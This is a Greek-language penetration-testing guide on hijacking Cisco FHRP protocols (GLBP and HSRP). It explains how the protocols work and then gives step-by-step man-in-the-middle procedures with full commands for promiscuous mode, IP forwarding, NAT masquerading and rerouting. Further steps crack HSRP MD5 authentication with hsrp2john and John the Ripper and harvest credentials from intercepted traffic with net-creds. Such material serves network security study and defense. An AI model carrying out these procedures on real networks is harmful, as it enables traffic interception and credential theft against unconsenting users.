Επισκόπηση Απάτης FHRP Hijacking

Εισαγωγή στο FHRP

Το FHRP σχεδιάστηκε για να παρέχει ανθεκτικότητα δικτύου με τη συγχώνευση πολλαπλών δρομολογητών σε μια μοναδική εικονική μονάδα, βελτιώνοντας έτσι τη διανομή φορτίου και την ανοχή σε βλάβες. Η Cisco Systems εισήγαγε πρωτόκολλα όπως το GLBP και το HSRP σε αυτή τη σουίτα.

Εισαγωγή στο Πρωτόκολλο GLBP

Η δημιουργία της Cisco, το GLBP, λειτουργεί στο στοίβα TCP/IP, χρησιμοποιώντας UDP στη θύρα 3222 για επικοινωνία. Οι δρομολογητές σε μια ομάδα GLBP ανταλλάσσουν πακέτα "hello" σε διαστήματα 3 δευτερολέπτων. Αν ένας δρομολογητής αποτύχει να στείλει αυτά τα πακέτα για 10 δευτερόλεπτα, υποθέτεται ότι είναι εκτός λειτουργίας. Ωστόσο, αυτοί οι χρονομετρητές δεν είναι σταθεροί και μπορούν να τροποποιηθούν.

Λειτουργίες και Διανομή Φορτίου του GLBP

Το GLBP ξεχωρίζει επιτρέποντας τη διανομή φορτίου σε δρομολογητές χρησιμοποιώντας ένα μοναδικό εικονικό IP σε συνδυασμό με πολλές εικονικές MAC διευθύνσεις. Σε μια ομάδα GLBP, κάθε δρομολογητής συμμετέχει στην προώθηση πακέτων. Αντίθετα με το HSRP/VRRP, το GLBP προσφέρει γνήσια ισορροπία φορτίου μέσω διαφόρων μηχανισμών:

• Ισορροπία Φορτίου Εξαρτημένη από τον Χρήστη: Διατηρεί σταθερή ανάθεση διεύθυνσης MAC AVF σε έναν υπολογιστή, το οποίο είναι ουσιώδες για σταθερές ρυθμίσεις NAT.

• Ισορροπία Φορτίου Round-Robin: Η προεπιλεγμένη προσέγγιση, εναλλάσσει την ανάθεση διεύθυνσης MAC AVF μεταξύ των αιτούντων υπολογιστών.

• Ισορροπία Φορτίου Με Βάρη Round-Robin: Διανέμει το φορτίο με βάση τις προκαθορισμένες μετρικές "Βάρος".

Κύρια Στοιχεία και Ορολογίες στο GLBP

• AVG (Ενεργή Εικονική Πύλη): Ο κύριος δρομολογητής, υπεύθυνος για την ανάθεση διευθύνσεων MAC σε δρομολογητές ομότιμους.

• AVF (Ενεργός Εικονικός Προωθητής): Ένας δρομολογητής που έχει οριστεί για τη διαχείριση της κίνησης στο δίκτυο.

• Προτεραιότητα GLBP: Μετρική που καθορίζει τον AVG, ξεκινώντας από προεπιλεγμένη τιμή 100 και κυμαίνεται μεταξύ 1 και 255.

• Βάρος GLBP: Αντικατοπτρίζει το τρέχον φορτίο σε ένα δρομολογητή, ρυθμίσιμο είτε χειροκίνητα είτε μέσω Ανίχνευσης Αντικειμένου.

• Εικονική Διεύθυνση IP GLBP: Λειτουργεί ως προεπιλεγμένη πύλη για όλες τις συνδεδεμένες συσκευές.

Για τις αλληλεπιδράσεις, το GLBP χρησιμοποιεί την ειδική διεύθυνση πολυεκπομπής 224.0.0.102 και τη θύρα UDP 3222. Οι δρομολογητές μεταδίδουν πακέτα "hello" σε διαστήματα 3 δευτερολέπτων και θεωρούνται μη λειτουργικοί αν χάσουν ένα πακέτο για διάρκεια 10 δευτερολέπτων.

Μηχανισμός Επίθεσης GLBP

Ένας επιτιθέμενος μπορεί να γίνει ο κύριος δρομολογητής αποστέλλοντας ένα πακέτο GLBP με τη μεγαλύτερη τιμή προτεραιότητας (255). Αυτό μπορεί να οδηγήσει σε επιθέσεις DoS ή MITM, επιτρέποντας την παρεμπόδιση ή την ανακατεύθυνση της κίνησης.

Εκτέλεση Επίθεσης GLBP με το Loki

Το Loki μπορεί να εκτελέσει μια επίθεση GLBP με την ενσωμάτωση ενός πακέτου με τιμή προτεραιότητας και βάρος που έχει οριστεί σε 255. Οι προεπιθετικές ενέργειες περιλαμβάνουν τη συλλογή πληροφοριών όπως η εικονική διεύθυνση IP, η παρουσία πιστοποίησης και οι τιμές προτεραιότητας του δρομολογητή χρησιμοποιώντας εργαλεία όπως το Wireshark.

Βήματα Επίθεσης:

1. Αλλαγή σε προωθητική λειτουργία και ενεργοποίηση προώθησης IP.

2. Αναγνώριση του στόχου δρομολογητή και ανάκτηση της IP του.

3. Δημιουργία ενός Ανιδιότιμου ARP.

4. Ενσωμάτωση ενός κακόβουλου πακέτου GLBP, προσωποποιώντας τον AVG.

5. Ανάθεση δευτερεύουσας διεύθυνσης IP στη διεπαφή δικτύου του επιτιθέμενου, αντικατοπτρίζοντας την εικονική διεύθυνση IP του GLBP.

6. Εφαρμογή SNAT για πλήρη ορατότητα της κίνησης.

7. Προσαρμογή της δρομολόγησης για να διασφαλιστεί η συνεχής πρόσβαση στο διαδίκτυο μέσω του αρχικού δρομολογητή AVG.

Ακολουθώντας αυτά τα βήματα, ο επιτιθέμενος τοποθετείται ως "άνθρωπος στη μέση", ικανός να παρεμβαίνει και να αναλύει την κίνηση του δικτύου, συμπεριλαμβανομένων μη κρυπτογραφημένων ή ευαίσθητων δεδομένων.

Για επίδειξη, εδώ υπάρχουν τα απαιτούμενα αποσπάσματα εντολών:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Παθητική Εξήγηση της Απαγωγής του HSRP με Λεπτομέρειες Εντολών

Επισκόπηση του HSRP (Hot Standby Router/Redundancy Protocol)

Το HSRP είναι ένα πρωτόκολλο που ανήκει στην Cisco σχεδιασμένο για την αντιγραφή ασφάλειας της πύλης δικτύου. Επιτρέπει τη διαμόρφωση πολλαπλών φυσικών δρομολογητών σε μια μονάδα με ένα κοινό διεύθυνση IP. Αυτή η λογική μονάδα διαχειρίζεται από έναν κύριο δρομολογητή που είναι υπεύθυνος για την κατεύθυνση της κίνησης. Αντίθετα με το GLBP, το οποίο χρησιμοποιεί μετρήσεις όπως προτεραιότητα και βάρος για την ισορροπία φορτίου, το HSRP βασίζεται σε έναν μόνο ενεργό δρομολογητή για τη διαχείριση της κίνησης.

Ρόλοι και Ορολογία στο HSRP

• Ενεργός Δρομολογητής HSRP: Η συσκευή που λειτουργεί ως πύλη, διαχειρίζεται τη ροή της κίνησης.

• Δευτερεύων Δρομολογητής HSRP: Ένας εφεδρικός δρομολογητής, έτοιμος να αναλάβει τον ρόλο αν ο ενεργός δρομολογητής αποτύχει.

• Ομάδα HSRP: Ένα σύνολο δρομολογητών που συνεργάζονται για το σχηματισμό ενός μοναδικού εικονικού δρομολογητή ανθεκτικού.

• Διεύθυνση MAC HSRP: Μια εικονική διεύθυνση MAC που ανατίθεται στον λογικό δρομολογητή στη διάταξη HSRP.

• Εικονική Διεύθυνση IP HSRP: Η εικονική διεύθυνση IP της ομάδας HSRP, λειτουργώντας ως η προεπιλεγμένη πύλη για τις συνδεδεμένες συσκευές.

Εκδόσεις HSRP

Το HSRP έρχεται σε δύο εκδόσεις, HSRPv1 και HSRPv2, που διαφέρουν κυρίως στη χωρητικότητα ομάδας, στη χρήση πολυδιανομής IP και στη δομή της εικονικής διεύθυνσης MAC. Το πρωτόκολλο χρησιμοποιεί συγκεκριμένες διευθύνσεις IP πολυδιανομής για την ανταλλαγή πληροφοριών υπηρεσίας, με πακέτα Hello που στέλνονται κάθε 3 δευτερόλεπτα. Ένας δρομολογητής θεωρείται ανενεργός αν δεν λάβει κανένα πακέτο εντός ενός χρονικού διαστήματος 10 δευτερολέπτων.

Μηχανισμός Επίθεσης HSRP

Οι επιθέσεις HSRP περιλαμβάνουν τη λήψη με τη βία του ρόλου του Ενεργού Δρομολογητή με την εισαγωγή μέγιστης τιμής προτεραιότητας. Αυτό μπορεί να οδηγήσει σε επίθεση Man-In-The-Middle (MITM). Οι βασικές βήματα πριν από την επίθεση περιλαμβάνουν τη συλλογή δεδομένων σχετικά με τη διάταξη του HSRP, το οποίο μπορεί να γίνει χρησιμοποιώντας το Wireshark για ανάλυση της κίνησης.

Βήματα για την Παράκαμψη Πιστοποίησης HSRP

1. Αποθηκεύστε την κίνηση δικτύου που περιέχει δεδομένα HSRP ως αρχείο .pcap.

tcpdump -w hsrp_traffic.pcap

2. Εξαγάγετε τις κατακερματισμένες τιμές MD5 από το αρχείο .pcap χρησιμοποιώντας το hsrp2john.py.

python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes

3. Κατακερματίστε τις τιμές MD5 χρησιμοποιώντας το John the Ripper.

john --wordlist=mywordlist.txt hsrp_hashes

Εκτέλεση Εισαγωγής HSRP με το Loki

1. Εκκινήστε το Loki για την αναγνώριση των διαφημίσεων HSRP.

2. Ορίστε τη διεπαφή δικτύου σε λειτουργία promiscuous και ενεργοποιήστε την προώθηση IP.

sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

3. Χρησιμοποιήστε το Loki για να στοχεύσετε τον συγκεκριμένο δρομολογητή, εισαγάγετε τον κατακερματισμένο κωδικό HSRP και πραγματοποιήστε τις απαραίτητες ρυθμίσεις για να υποκαταστήσετε τον Ενεργό Δρομολογητή.

4. Αφού αποκτήσετε τον ρόλο του Ενεργού Δρομολογητή, ρυθμίστε τη διεπαφή δικτύου και τους πίνακες IP για να παρεμβάλλετε τη νόμιμη κίνηση.

sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

5. Τροποποιήστε τον πίνακα δρομολόγησης για να καθοδηγεί την κίνηση μέσω του προηγούμενου Ενεργού Δρομολογητή.

sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

6. Χρησιμοποιήστε το net-creds.py ή ένα παρόμοιο εργαλείο για να αιχμαλωτίσετε διαπιστευτήρια από την παρεμβαλλόμενη κίνηση.

sudo python2 net-creds.py -i eth0

Η εκτέλεση αυτών των βημάτων τοποθετεί τον επιτιθέμενο σε μια θέση για να αιχμαλωτίσει και να χειρίζεται την κίνηση, παρόμοια με τη διαδικασία για την απαγωγή του GLBP. Αυτό υπογραμμίζει την ευπάθεια σε πρωτόκολλα αντιγραφής ασφάλειας όπως το HSRP και την ανάγκη για ανθεκτικά μέτρα ασφαλείας.